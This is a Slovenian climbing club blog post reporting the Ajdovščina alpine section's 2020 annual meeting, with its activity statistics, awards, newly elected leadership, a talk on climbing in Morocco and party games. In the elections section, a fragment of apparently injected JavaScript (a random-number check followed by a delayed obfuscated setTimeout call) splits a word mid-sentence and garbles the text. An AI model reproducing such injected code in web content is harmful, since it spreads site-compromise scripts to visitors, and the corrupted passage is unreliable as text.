Občni zbor 2020

Written by Dominik

January 18, 2020

Občni zbor Alpinističnega odseka Planinskega društva Ajdovščina

Tradicionalna lokacija v Taborniškem domu na Kovku je 18.01.2020 vnovič gostila občni zbor Alpinističnega odseka Planinskega društva Ajdovščina, že 18. po vrsti. Tokrat so se še posebej izkazali tečajniki, ki so poskrbeli za popoldansko kuhanje alpinističnega golaža s poletno. Kmalu po 17:00 h se je začela zbirati širša alpinistična falanga in pričela s simultanko v več dejanjih.

1. dejanje – večerja

Vseprisotno je bilo preko 40 glavo alpinistično občestvo sestavljeno iz celotnega spektra zemljotlačcev, od mladih konstantno nabitih pištol do ostarelih prdcev, ki jim nerganje gre zelo dobro od rok. Za uvod vrhunsko kulinarično doživetje – ravno prav začinjen golaž s polento. Za tekočo spremljavo sta poskrbela zakonca Močivnik z odličnimi vini. Piana je tekla v alegro ritmu.

2. dejanje – pregled dela, uradni del

Načelnik Egon Pavlica je podal poročilo. V letu 2019 smo opravili 280 vzponov, kar je precej več kot predlani in vse bližje smo zgodovinsko rekordnemu 2015, ko jih je bilo 390. V letu 2019 smo imeli 8 skupnih tur od severne stene Triglava, preko Paklenice do Mont Blanca. V alpinistični šoli je bilo 9 tečajnikov, 8 jih je uspešno opravilo izpit. Nova sezona alpinističnega šole 2019/2020 pa ima 16 tečajnnikov, opravljenih je bilo že 16 od 29 predvidenih točk. Velikega priznanja je bil deležen festival ZUNAJ izpod peresa in dela Simona Ušaja in Ane Plesničar. Spomnili smo se še sedaj že legendarnega piknika pri balvanu.

3. dejanje – podelitev nagrad, uradni del

Vsako leto se podeljuje nagrade v večih kategorijah. Namen nagrad je spodbujanje k aktivnemu plezanju in priznanje tistim, ki naredijo nekaj več.

a.) Najbolj kompleksen vzpon: Augile Noir de Peuterey, Ratti – Vitali, IV/6a, A1 700 m, 9 h. Plezal Matic Štrancar z Markom in Aleksom iz AO Matica.

b.) Največ vzponov v letu: Marko Butinar – 37 alpinističnih vzponov

c.) Največ vzponov v letu – ženske: Karmen Pahor – 12 alpinističnih vzponov

d.) Naj prvenstvena smer v letu: Kovk, Beng/Beng, VIII-/VI, A0, 100 m, 2 h, Vid Štrancar, Matic Štrancar, Jure Uršič

e.) Najbližje soncu: Khala Patar, Nepal, 5550 m, Boštjan Mikuž in Anamarija Božič

f.) Nagrada za posebne dosežke: Simon Ušaj in Ana Plesničar za organizacijo festivala Zunaj

4. dejanje – volitve, uradni del

Po »silnem« spopadu večih kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidatov, izmenjavi mnenj, argumentov, pohval in nerganju starih prdcev je bilo soglasno potrjeno novo vodstvo alpinističnega odseka.

Načelnik: Matic Štrancar

Podnačelnik: Egon Pavlica

Ekonom: Dominik Mikuž

Finančnik: Danijel Lozar

Dosedanji načelnik Egon Pavlica je za svoje uspešno delo prejel knjigo Tomaža Humarja s posvetilom. Matic je tako postal 4 načelnik AO Ajdovščina. Tri legende pred njim so Simon Ušaj, Boštjan Mikuž in Egon Pavlica. Novi načelnik je obljubil nadaljevanje uspešnega dela s še večjim poudarkom na kvaliteti. Občni zbor so obiskali tudi predstavniki prijateljskih alpinističnih odsekov, pozdravne besede so nam namenili iz Obalnega alpinističnega odseka in AO Vipava.

5. dejanje – predavanje o plezanju v Maroku, poluradni del

Marko Orel je slikovito predstavil plezanje v Maroku, katerega sta v novembru izvedla skupaj s Stivenom Kocjančičem. Plezala sta v soteski Todra Gorge, predavanje je navdušilo!

6. dejanje – alpinijada za zlato vponko in ananas, zelo resen tekmovalni del

Letošnja novost je bila alpinijada v treh disciplinah. Med seboj se je pomerilo 9 ekip. Imeli smo tri različne discipline. Prva je bila met vponke na zaprt dežnik, druga zabijanje žeblja v klado v čim manj poskusih, tretja pa navezovanje soplezalca z zavezanimi očmi. Bili so se ogorčeni boji, na koncu pa je slavila ekipa Egona Pavlice, predvsem na rovaš tega, ker je uspel navezati soplezalca z zavezanimi očmi v 24 sekundah. Drugo mesto sta si delili ekipa Mix wade in Gamsi, stopničke pa so zaokrožile Vztrajne koze. Zmagovalna ekipa je prejela zlato vponko in ananas.

7. dejanje – ples

To dejanje je zaznamoval DJ Gurtna, ki je posedoval tudi kroglo in stroboskop. Ples je bil zelo intenziven. Nadaljnja dejanja so prepuščena domišljiji bralca, namignemo pa lahko, da bila so.

Vsi tisti, ki bi svojim nonam želeli lagati, da v hribe samo hodijo, so vabljeni v našo družbo.

Zapisal:

Star italijanski kamion OM

Categories

Archives

You May Also Like…

Hvar Climb and Sail

Hvar Climb and Sail

Premierni climb and sail alpinističnega odseka Ajdovščina je uspešno za nami! Težko je zbrati vsa čustva v samostojni...

Prvomajska Sardinija

Prvomajska Sardinija

Kje in Kdaj: Sardinija (Dorgali, Santa Maria Navarrese), 26.4.-7.5. Kdo: Luka Batagelj, Stiven Kocijančič, Sašo...

0 Comments

Submit a Comment